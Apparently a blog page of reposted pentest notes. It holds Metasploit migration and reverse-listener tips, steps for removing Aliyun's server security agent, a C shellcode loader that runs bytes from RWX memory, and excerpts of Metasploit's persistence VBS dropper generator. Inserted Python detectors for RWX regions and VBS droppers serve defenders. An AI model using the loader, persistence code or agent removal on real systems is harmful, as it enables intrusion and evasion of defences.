Stager: automatic process migration

Reposted from: https://community.rapid7.com/thread/3822
What you are experiencing is common on systems in the wild (I see it more often in VM environments). Basically, the process you’re exploiting is not stable enough to keep a shell open, and as you seem to already know, you need to migrate into another process ASAP in order to keep your shell. Instead of set PrependMigrate true try:

set InitialAutoRunScript migrate -f

I have had better experiences with this method than with the PrependMigrate method.

nap_

Uninstalling the Aliyun service, Yundun (云盾) and Anqishi (安骑士) on Linux

On Linux systems

Download http://update.aegis.aliyun.com/download/uninstall.sh

Run the following commands:
chmod +x uninstall.sh
sh uninstall.sh (on Debian: ./uninstall.sh)
rm /usr/sbin/aliyun-service
rm /lib/systemd/system/aliyun.service
Uninstall from the control panel:
Anqishi (安骑士) -> Settings -> Install Anqishi
But the official automatic uninstaller does not seem to be of much use.

Kali + VNC: an alternative to LXDE

Reposted from: https://forums.kali.org/showthread.php?26823-Remote-access-with-SSH-TightVNC-failed-with-new-Kali-2-0
I have, but it involves installing the MATE desktop environment, which is a GNOME 2 fork.

First, you have to install MATE:

$ sudo apt-get install mate-core mate-desktop-environment-extra mate-desktop-environment-extras mate-themes

Then, you have to change a line in the ~/.vnc/xstartup, replacing

/etc/X11/Xsession

with

/usr/bin/mate-session

It is just a workaround, as MATE offers a different look and feel than GNOME.

The underlying problems with GNOME and VNC (and RDP, NX, …) are described here:

https://bugs.debian.org/cgi-bin/bugr…cgi?bug=776746
https://bugs.launchpad.net/ubuntu/+s…n/+bug/1251281

and it looks like a fix for Debian will take some time…

Reposting a few shellcode loaders

Reference: https://github.com/VeroFess/shellcode_loader/blob/master/loader.c

#include <stdio.h>
#include <string.h>   /* memcpy */

#ifdef _MSC_VER
#define forceinline __forceinline
#elif defined __GNUC__
#define forceinline __inline__ __attribute__((always_inline))
#else
#define forceinline
#endif

#if defined(__linux__) || defined(linux)
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>   /* close */
#ifdef __x86_64__
#define __VM_X64
#elif defined(__i386__)
#define __VM_X32
#endif
/* Map a private read/write/execute region backed by /dev/zero. Returns NULL on failure. */
forceinline void * __runable_malloc(int size) {
	int fd = open("/dev/zero", O_RDONLY);
	if (fd < 0)
		return NULL;
	void * ret = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE, fd, 0);
	close(fd);
	return ret == MAP_FAILED ? NULL : ret;
}
#else
#include <Windows.h>
#ifdef _WIN64
#define __VM_X64
#else
#define __VM_X32
#endif
/* Commit a read/write/execute region. Returns NULL on failure. */
forceinline void * __runable_malloc(int size) {
	return VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
}
#endif

/* Copy the bytes into executable memory and append a 'ret' (0xc3) so the
 * block can be called like an ordinary function. */
forceinline void * __makefunction(unsigned char * shellcode, int len) {
	void * address_shellcode = __runable_malloc(len + 1);
	if (address_shellcode == NULL)
		return NULL;
	memcpy((char *)address_shellcode, shellcode, len);
	*((char *)address_shellcode + len) = 0xc3;
	return address_shellcode;
}

int main(void) {
	typedef unsigned long (*func)(void);
#ifdef __VM_X64
	unsigned char shellcode[] = { 0x48,0xC7,0xC0,0x01,0x00,0x00,0x00 };  /* mov rax, 1 */
#else
	unsigned char shellcode[] = { 0xb8,0x01,0x00,0x00,0x00 };            /* mov eax, 1 */
#endif
	func fun = (func)__makefunction(shellcode, sizeof(shellcode));
	if (fun == NULL) {
		fprintf(stderr, "could not allocate executable memory\n");
		return 1;
	}
	unsigned long ret = fun();
	printf("ret is : %lu\n", ret);
	getchar();
	return 0;
}
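As an added, defender-side example (not part of the loader above or of the repository it comes from): the loader requests a PROT_READ | PROT_WRITE | PROT_EXEC mapping, which is exactly what a memory scanner flags, since ordinary code has no reason to be writable and executable at the same time. The Python below parses /proc/<pid>/maps text and reports RWX regions; the sample lines are constructed to resemble a process that ran the loader, and scan_pid() applies the same check to a live process on Linux.

```python
"""Flag writable+executable (RWX) mappings in /proc/<pid>/maps.

Added example, not part of the loader above. Works on constructed maps text
and, on Linux, on a live process via scan_pid().
"""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import List

# Layout of one /proc/<pid>/maps line:
#   start-end perms offset dev inode [pathname]
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+"
    r"(?P<perms>[rwxps-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+"
    r"(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+"
    r"(?P<inode>\d+)\s*"
    r"(?P<path>.*)$"
)


@dataclass(frozen=True)
class Mapping:
    start: int
    end: int
    perms: str
    path: str

    @property
    def size(self) -> int:
        return self.end - self.start

    @property
    def is_rwx(self) -> bool:
        return self.perms.startswith("rwx")

    @property
    def is_file_backed(self) -> bool:
        # Anonymous memory, [heap]/[stack] pseudo-paths and a private /dev/zero
        # mapping (the loader's case, typically reported under that path) have
        # no file on disk whose contents could be compared against.
        return self.path.startswith("/") and not self.path.startswith("/dev/zero")


def parse_maps(text: str) -> List[Mapping]:
    """Parse maps text into Mapping records; malformed lines are skipped."""
    out = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            out.append(Mapping(int(m["start"], 16), int(m["end"], 16),
                               m["perms"], m["path"].strip()))
    return out


def find_rwx(mappings: List[Mapping]) -> List[Mapping]:
    """Return every mapping that is readable, writable and executable."""
    return [m for m in mappings if m.is_rwx]


def describe(m: Mapping) -> str:
    kind = "file-backed" if m.is_file_backed else "non-file-backed"
    return f"{m.start:x}-{m.end:x} {m.perms} {m.size} bytes {kind} {m.path or '(anonymous)'}"


def scan_pid(pid: int) -> List[Mapping]:
    """Read /proc/<pid>/maps on a live Linux system and return its RWX regions."""
    return find_rwx(parse_maps(Path(f"/proc/{pid}/maps").read_text()))


# Constructed sample modelled on a process that ran the loader above; the
# rwxp line is the kind of region the /dev/zero mmap produces.
SAMPLE_MAPS = """\
55d0c2a00000-55d0c2a01000 r--p 00000000 fd:01 1234567 /tmp/loader
55d0c2a01000-55d0c2a02000 r-xp 00001000 fd:01 1234567 /tmp/loader
55d0c2c00000-55d0c2c21000 rw-p 00000000 00:00 0 [heap]
7f3a1c000000-7f3a1c001000 rwxp 00000000 00:00 0 /dev/zero (deleted)
7f3a1c200000-7f3a1c3c5000 r-xp 00000000 fd:01 2345678 /usr/lib/x86_64-linux-gnu/libc.so.6
7ffd5e3f0000-7ffd5e411000 rw-p 00000000 00:00 0 [stack]
"""

if __name__ == "__main__":
    for m in find_rwx(parse_maps(SAMPLE_MAPS)):
        print("RWX:", describe(m))
```

A JIT compiler legitimately produces RWX regions, so in practice the verdict is per-process allowlisting rather than a flat rule; the non-file-backed distinction matters because a file-backed RWX region can still be compared to its image on disk, an anonymous one cannot.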


msf persistence AV evasion

The persistence module calls:
/usr/local/share/metasploit-framework/modules/exploits/windows/local/persistence.rb

    exe = generate_payload_exe
    # Generate the vbs payload
    vprint_status("Generating VBS persistent script (#{rvbs_name})")
    vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})

::Msf::Util::EXE.to_exe_vbs comes from /usr/local/share/metasploit-framework/lib/msf/util/exe.rb

  # self.to_exe_vbs
  #
  # @param  exes  [String]
  # @param  opts  [Hash]
  # @option opts  [String] :delay
  # @option opts  [String] :persist
  # @option opts  [String] :exe_filename
  def self.to_exe_vbs(exes = '', opts = {})
    delay   = opts[:delay]   || 5
    persist = opts[:persist] || false

    hash_sub = {}
    hash_sub[:exe_filename]  = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
    hash_sub[:base64_filename]  = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
    hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_fname]     = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_func]      = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_obj]       = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_shell]     = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_tempdir]   = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_tempexe]   = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_basedir]   = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
    hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:init] = ""

    if persist
      hash_sub[:init] << "Do\r\n"
      hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
      hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n"
      hash_sub[:init] << "Loop\r\n"
    else
      hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
    end

    read_replace_script_template("to_exe.vbs.template", hash_sub)
  end

to_exe.vbs.template comes from /usr/local/share/metasploit-framework/data/templates/scripts/to_exe.vbs.template

After that, all sorts of transformation and obfuscation.
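As an added, defender-side example (not the page's or Metasploit's own code): the persist branch above emits a "Do ... WScript.Sleep <delay * 1000> ... Loop" block that re-runs the decode function, and the script carries the whole executable as one base64 literal (base64_shellcode). Both traits survive the identifier randomisation that hash_sub performs, so the Python below looks for them in a VBS text rather than for names. The sample script is constructed to mirror that structure (names chosen here, a dummy MZ header padded with zeros instead of a real payload).

```python
"""Heuristics for VBS droppers shaped like to_exe.vbs: a sleep loop that
re-runs a procedure, plus an embedded base64 PE. Added example, not
Metasploit code; the sample script below is constructed."""
import base64
import binascii
import re
from typing import Dict, List, Optional

B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
IDENT = re.compile(r"[A-Za-z_]\w*")


def find_sleep_loops(script: str) -> List[Dict[str, object]]:
    """Walk the script line by line and collect Do ... WScript.Sleep ... Loop
    blocks, noting the sleep interval and the bare procedure calls inside."""
    loops: List[Dict[str, object]] = []
    current: Optional[Dict[str, object]] = None
    for lineno, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if re.fullmatch(r"Do(\s+(While|Until)\b.*)?", line, re.IGNORECASE):
            current = {"start": lineno, "sleep_ms": None, "calls": []}
        elif current is None:
            continue
        elif (m := re.fullmatch(r"WScript\.Sleep\s+(\d+)", line, re.IGNORECASE)):
            current["sleep_ms"] = int(m.group(1))
        elif re.fullmatch(r"Loop(\s+(While|Until)\b.*)?", line, re.IGNORECASE):
            current["end"] = lineno
            loops.append(current)
            current = None
        elif IDENT.fullmatch(line):
            # A bare identifier on its own line is a procedure call.
            current["calls"].append(line)
    return loops


def find_base64_blobs(script: str) -> List[Dict[str, object]]:
    """Decode long base64 runs and note whether they start with the PE 'MZ' magic."""
    blobs: List[Dict[str, object]] = []
    for m in B64_RUN.finditer(script):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        blobs.append({"offset": m.start(), "decoded_len": len(data),
                      "is_pe": data[:2] == b"MZ"})
    return blobs


def assess(script: str) -> Dict[str, object]:
    """Combine the two traits into a verdict; delay_seconds undoes the * 1000."""
    loops = [l for l in find_sleep_loops(script)
             if l["sleep_ms"] is not None and l["calls"]]
    pe = any(b["is_pe"] for b in find_base64_blobs(script))
    return {
        "persist_loop": bool(loops),
        "delay_seconds": loops[0]["sleep_ms"] / 1000 if loops else None,
        "embedded_pe": pe,
        "suspicious": bool(loops) and pe,
    }


# Constructed sample: random-looking names, a dummy 'MZ' header padded with
# zeros (not an executable), and the persist loop with delay = 5 s.
_DUMMY_PE = base64.b64encode(b"MZ\x90\x00" + bytes(300)).decode()
SAMPLE_VBS = "\r\n".join([
    "Dim xkqpmzlwab",
    f'xkqpmzlwab = "{_DUMMY_PE}"',
    "Function kqzwprmtxu()",
    "  ' decode xkqpmzlwab, write it to a temp file and start it (omitted here)",
    "End Function",
    "Do",
    "kqzwprmtxu",
    "WScript.Sleep 5000",
    "Loop",
])
BENIGN_VBS = "Dim i\r\nFor i = 1 To 3\r\n  WScript.Echo i\r\nNext"

if __name__ == "__main__":
    print(assess(SAMPLE_VBS))
    print(assess(BENIGN_VBS))
```

Renaming variables does nothing against these checks; what would change the picture is splitting or re-encoding the blob and restructuring the loop, which is why the text above says obfuscation is the next step and why a detector should key on structure and decoded content rather than on strings.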

msf tips: session is not valid and will be closed

When the locally bindable IP differs from the external IP:
LHOST and LPORT tell the beacon where to find the server.
ReverseListenerBindHost is the bind address.
AutoVerifySession also needs to be disabled (reason unknown).

Issue:
https://github.com/rapid7/metasploit-framework/issues/6799
See also:
https://github.com/rapid7/metasploit-framework/wiki/Debugging-Dead-Meterpreter-Sessions

PyQt5 development environment setup

1. eric IDE development environment
http://eric-ide.python-projects.org/eric-download.html
Installation using PyQt5 wheels

Installing eric6 and its pre-requisites is easy using the PyQt5 Python wheels. In order to have access to the suite of Qt tools and documentation it is recommended to install the Qt development environment because these tools are not part of the PyQt5 wheels.

Download the Qt online installer from the Qt download site.
Install Qt by executing the installer.
Install the eric6 pre-requisites (PyQt, sip and QScintilla) by entering this command in a shell / command window:
pip install qscintilla
or
pip3 install qscintilla
This will install QScintilla and all dependencies, which are PyQt5 and sip.
Install eric6 and configure the path to the Qt tools on the Qt page of the configuration dialog.
Once the eric6 IDE is started the Qt documentation may be loaded into the eric web browser via the Settings ➡ Manage Qt Help Documents menu entry. Note that the documentation (Python/Qt/PyQt) is available in QtHelp format as of November 2016 as documentation plug-ins. In order to use this feature, eric 16.11 or newer needs to be installed.